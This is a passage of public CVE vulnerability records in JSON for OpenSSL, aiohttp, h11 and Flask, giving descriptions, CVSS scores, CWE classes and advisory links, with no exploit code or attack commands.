"url": "https://github.com/openssl/openssl/commit/87ebd203feffcf92ad5889df92f90bb0ee10a699"
},
{
"name": "3.2.4 git commit",
"tags": [
"patch"
],
"url": "https://github.com/openssl/openssl/commit/798779d43494549b611233f92652f0da5328fbe7"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "RFC7250 handshakes with unauthenticated servers don\u0027t abort as expected",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5",
"assignerShortName": "openssl",
"cveId": "CVE-2024-12797",
"datePublished": "2025-02-11T15:59:36.719Z",
"dateReserved": "2024-12-19T13:54:37.212Z",
"dateUpdated": "2025-02-18T14:01:55.140Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2025-69229 (GCVE-0-2025-69229)
Vulnerability from cvelistv5 – Published: 2026-01-05 23:37 – Updated: 2026-01-06 19:02- CWE-770 - Allocation of Resources Without Limits or Throttling
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-69229",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-01-06T14:24:45.403446Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-01-06T19:02:09.630Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "aiohttp",
"vendor": "aio-libs",
"versions": [
{
"status": "affected",
"version": "\u003c 3.13.3"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. In versions 3.13.2 and below, handling of chunked messages can result in excessive blocking CPU usage when receiving a large number of chunks. If an application makes use of the request.read() method in an endpoint, it may be possible for an attacker to cause the server to spend a moderate amount of blocking CPU time (e.g. 1 second) while processing the request. This could potentially lead to DoS as the server would be unable to handle other requests during that time. This issue is fixed in version 3.13.3."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-770",
"description": "CWE-770: Allocation of Resources Without Limits or Throttling",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-01-05T23:37:52.955Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-g84x-mcqj-x9qq",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-g84x-mcqj-x9qq"
},
{
"name": "https://github.com/aio-libs/aiohttp/commit/4ed97a4e46eaf61bd0f05063245f613469700229",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/aio-libs/aiohttp/commit/4ed97a4e46eaf61bd0f05063245f613469700229"
},
{
"name": "https://github.com/aio-libs/aiohttp/commit/dc3170b56904bdf814228fae70a5501a42a6c712",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/aio-libs/aiohttp/commit/dc3170b56904bdf814228fae70a5501a42a6c712"
}
],
"source": {
"advisory": "GHSA-g84x-mcqj-x9qq",
"discovery": "UNKNOWN"
},
"title": "AIOHTTP vulnerable to DoS through chunked messages"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-69229",
"datePublished": "2026-01-05T23:37:52.955Z",
"dateReserved": "2025-12-29T20:53:34.537Z",
"dateUpdated": "2026-01-06T19:02:09.630Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-69226 (GCVE-0-2025-69226)
Vulnerability from cvelistv5 – Published: 2026-01-05 22:52 – Updated: 2026-01-06 19:03| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-69226",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-01-06T14:25:35.975954Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-01-06T19:03:21.505Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "aiohttp",
"vendor": "aio-libs",
"versions": [
{
"status": "affected",
"version": "\u003c 3.13.3"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Versions 3.13.2 and below enable an attacker to ascertain the existence of absolute path components through the path normalization logic for static files meant to prevent path traversal. If an application uses web.static() (not recommended for production deployments), it may be possible for an attacker to ascertain the existence of path components. This issue is fixed in version 3.13.3."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "PRESENT",
"attackVector": "NETWORK",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-22",
"description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-200",
"description": "CWE-200: Exposure of Sensitive Information to an Unauthorized Actor",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-01-05T22:52:38.467Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-54jq-c3m8-4m76",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-54jq-c3m8-4m76"
},
{
"name": "https://github.com/aio-libs/aiohttp/commit/f2a86fd5ac0383000d1715afddfa704413f0711e",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/aio-libs/aiohttp/commit/f2a86fd5ac0383000d1715afddfa704413f0711e"
}
],
"source": {
"advisory": "GHSA-54jq-c3m8-4m76",
"discovery": "UNKNOWN"
},
"title": "AIOHTTP allows for a brute-force leak of internal static \ufb01lepath components"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-69226",
"datePublished": "2026-01-05T22:52:38.467Z",
"dateReserved": "2025-12-29T20:53:09.411Z",
"dateUpdated": "2026-01-06T19:03:21.505Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-69224 (GCVE-0-2025-69224)
Vulnerability from cvelistv5 – Published: 2026-01-05 22:35 – Updated: 2026-01-06 19:03- CWE-444 - Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-69224",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-01-06T14:25:43.789267Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-01-06T19:03:34.338Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "aiohttp",
"vendor": "aio-libs",
"versions": [
{
"status": "affected",
"version": "\u003c 3.13.3"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Versions 3.13.2 and below of the Python HTTP parser may allow a request smuggling attack with the presence of non-ASCII characters. If a pure Python version of AIOHTTP is installed (i.e. without the usual C extensions) or AIOHTTP_NO_EXTENSIONS is enabled, then an attacker may be able to execute a request smuggling attack to bypass certain firewalls or proxy protections. This issue is fixed in version 3.13.3."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "PRESENT",
"attackVector": "NETWORK",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-444",
"description": "CWE-444: Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-01-05T22:35:42.084Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-69f9-5gxw-wvc2",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-69f9-5gxw-wvc2"
},
{
"name": "https://github.com/aio-libs/aiohttp/commit/32677f2adfd907420c078dda6b79225c6f4ebce0",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/aio-libs/aiohttp/commit/32677f2adfd907420c078dda6b79225c6f4ebce0"
}
],
"source": {
"advisory": "GHSA-69f9-5gxw-wvc2",
"discovery": "UNKNOWN"
},
"title": "AIOHTTP\u0027s Unicode processing of header values could cause parsing discrepancies"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-69224",
"datePublished": "2026-01-05T22:35:42.084Z",
"dateReserved": "2025-12-29T20:46:13.630Z",
"dateUpdated": "2026-01-06T19:03:34.338Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-43859 (GCVE-0-2025-43859)
Vulnerability from cvelistv5 – Published: 2025-04-24 18:15 – Updated: 2025-04-24 19:02- CWE-444 - Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
| Vendor | Product | Version | ||
|---|---|---|---|---|
| python-hyper | h11 |
Affected:
< 0.16.0
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-43859",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-04-24T19:02:05.000674Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-04-24T19:02:45.130Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "h11",
"vendor": "python-hyper",
"versions": [
{
"status": "affected",
"version": "\u003c 0.16.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "h11 is a Python implementation of HTTP/1.1. Prior to version 0.16.0, a leniency in h11\u0027s parsing of line terminators in chunked-coding message bodies can lead to request smuggling vulnerabilities under certain conditions. This issue has been patched in version 0.16.0. Since exploitation requires the combination of buggy h11 with a buggy (reverse) proxy, fixing either component is sufficient to mitigate this issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-444",
"description": "CWE-444: Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-04-24T18:15:53.328Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/python-hyper/h11/security/advisories/GHSA-vqfr-h8mv-ghfj",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/python-hyper/h11/security/advisories/GHSA-vqfr-h8mv-ghfj"
},
{
"name": "https://github.com/python-hyper/h11/commit/114803a29ce50116dc47951c690ad4892b1a36ed",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/python-hyper/h11/commit/114803a29ce50116dc47951c690ad4892b1a36ed"
}
],
"source": {
"advisory": "GHSA-vqfr-h8mv-ghfj",
"discovery": "UNKNOWN"
},
"title": "h11 accepts some malformed Chunked-Encoding bodies"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-43859",
"datePublished": "2025-04-24T18:15:53.328Z",
"dateReserved": "2025-04-17T20:07:08.556Z",
"dateUpdated": "2025-04-24T19:02:45.130Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2025-69228 (GCVE-0-2025-69228)
Vulnerability from cvelistv5 – Published: 2026-01-05 23:30 – Updated: 2026-01-06 19:02- CWE-770 - Allocation of Resources Without Limits or Throttling
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-69228",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-01-06T14:25:03.661846Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-01-06T19:02:29.889Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "aiohttp",
"vendor": "aio-libs",
"versions": [
{
"status": "affected",
"version": "\u003c 3.13.3"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Versions 3.13.2 and below allow a request to be crafted in such a way that an AIOHTTP server\u0027s memory fills up uncontrollably during processing. If an application includes a handler that uses the Request.post() method, an attacker may be able to freeze the server by exhausting the memory. This issue is fixed in version 3.13.3."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-770",
"description": "CWE-770: Allocation of Resources Without Limits or Throttling",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-01-05T23:30:33.440Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-6jhg-hg63-jvvf",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-6jhg-hg63-jvvf"
},
{
"name": "https://github.com/aio-libs/aiohttp/commit/b7dbd35375aedbcd712cbae8ad513d56d11cce60",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/aio-libs/aiohttp/commit/b7dbd35375aedbcd712cbae8ad513d56d11cce60"
}
],
"source": {
"advisory": "GHSA-6jhg-hg63-jvvf",
"discovery": "UNKNOWN"
},
"title": "AIOHTTP vulnerable to denial of service through large payloads"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-69228",
"datePublished": "2026-01-05T23:30:33.440Z",
"dateReserved": "2025-12-29T20:53:24.489Z",
"dateUpdated": "2026-01-06T19:02:29.889Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-27205 (GCVE-0-2026-27205)
Vulnerability from cvelistv5 – Published: 2026-02-21 05:21 – Updated: 2026-02-24 19:03- CWE-524 - Use of Cache Containing Sensitive Information
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-27205",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-02-24T19:02:52.515600Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-02-24T19:03:11.374Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "flask",
"vendor": "pallets",
"versions": [
{
"status": "affected",
"version": "\u003c 3.1.3"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Flask is a web server gateway interface (WSGI) web application framework. In versions 3.1.2 and below, when the session object is accessed, Flask should set the Vary: Cookie header., resulting in a Use of Cache Containing Sensitive Information vulnerability. The logic instructs caches not to cache the response, as it may contain information specific to a logged in user. This is handled in most cases, but some forms of access such as the Python in operator were overlooked. The severity and risk depend on the application being hosted behind a caching proxy that doesn\u0027t ignore responses with cookies, not setting a Cache-Control header to mark pages as private or non-cacheable, and accessing the session in a way that only touches keys without reading values or mutating the session. The issue has been fixed in version 3.1.3."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "PRESENT",
"attackVector": "NETWORK",
"baseScore": 2.3,
"baseSeverity": "LOW",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "PASSIVE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-524",
"description": "CWE-524: Use of Cache Containing Sensitive Information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-02-21T05:21:17.214Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/pallets/flask/security/advisories/GHSA-68rp-wp8r-4726",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/pallets/flask/security/advisories/GHSA-68rp-wp8r-4726"
},
{
"name": "https://github.com/pallets/flask/commit/089cb86dd22bff589a4eafb7ab8e42dc357623b4",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pallets/flask/commit/089cb86dd22bff589a4eafb7ab8e42dc357623b4"
},
{
"name": "https://github.com/pallets/flask/releases/tag/3.1.3",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pallets/flask/releases/tag/3.1.3"
}
],
"source": {
"advisory": "GHSA-68rp-wp8r-4726",
"discovery": "UNKNOWN"
},
"title": "Flask session does not add `Vary: Cookie` header when accessed in some ways"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-27205",
"datePublished": "2026-02-21T05:21:17.214Z",
"dateReserved": "2026-02-18T19:47:02.155Z",
"dateUpdated": "2026-02-24T19:03:11.374Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-69225 (GCVE-0-2025-69225)
Vulnerability from cvelistv5 – Published: 2026-01-05 23:16 – Updated: 2026-01-06 19:02- CWE-444 - Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-69225",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-01-06T14:25:19.119274Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-01-06T19:02:59.048Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "aiohttp",
"vendor": "aio-libs",
"versions": [
{
"status": "affected",
"version": "\u003c 3.13.3"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Versions 3.13.2 and below contain parser logic which allows non-ASCII decimals to be present in the Range header. There is no known impact, but there is the possibility that there\u0027s a method to exploit a request smuggling vulnerability. This issue is fixed in version 3.13.3."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 2.7,
"baseSeverity": "LOW",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "LOW"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-444",
"description": "CWE-444: Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-01-05T23:16:19.158Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-mqqc-3gqh-h2x8",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-mqqc-3gqh-h2x8"
},
{
"name": "https://github.com/aio-libs/aiohttp/commit/c7b7a044f88c71cefda95ec75cdcfaa4792b3b96",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/aio-libs/aiohttp/commit/c7b7a044f88c71cefda95ec75cdcfaa4792b3b96"
}
],
"source": {
"advisory": "GHSA-mqqc-3gqh-h2x8",
"discovery": "UNKNOWN"
},
"title": "AIOHTTP Regex Mismatch Allows Unicode in ASCII-Only Protocol Fields"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-69225",
"datePublished": "2026-01-05T23:16:19.158Z",
"dateReserved": "2025-12-29T20:52:59.444Z",
"dateUpdated": "2026-01-06T19:02:59.048Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-34513 (GCVE-0-2026-34513)
Vulnerability from cvelistv5 – Published: 2026-04-01 20:06 – Updated: 2026-06-23 15:50- CWE-770 - Allocation of Resources Without Limits or Throttling
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-34513",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-04-02T15:14:09.818200Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-06-23T15:50:30.916Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "aiohttp",
"vendor": "aio-libs",
"versions": [
{
"status": "affected",
"version": "\u003c 3.13.4"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Prior to version 3.13.4, an unbounded DNS cache could result in excessive memory usage possibly resulting in a DoS situation. This issue has been patched in version 3.13.4."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 2.7,
"baseSeverity": "LOW",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-770",
"description": "CWE-770: Allocation of Resources Without Limits or Throttling",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-01T20:06:13.718Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-hcc4-c3v8-rx92",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-hcc4-c3v8-rx92"
},
{
"name": "https://github.com/aio-libs/aiohttp/commit/c4d77c3533122be353b8afca8e8675e3b4cbda98",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/aio-libs/aiohttp/commit/c4d77c3533122be353b8afca8e8675e3b4cbda98"
},
{
"name": "https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"
}
],
"source": {
"advisory": "GHSA-hcc4-c3v8-rx92",
"discovery": "UNKNOWN"
},
"title": "AIOHTTP: Denial of Service (DoS) via Unbounded DNS Cache in TCPConnector"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-34513",
"datePublished": "2026-04-01T20:06:13.718Z",
"dateReserved": "2026-03-30T16:03:31.047Z",
"dateUpdated": "2026-06-23T15:50:30.916Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-45409 (GCVE-0-2026-45409)
Vulnerability from cvelistv5 – Published: 2026-06-05 22:06 – Updated: 2026-06-08 16:34- CWE-1333 - Inefficient Regular Expression Complexity
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-45409",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
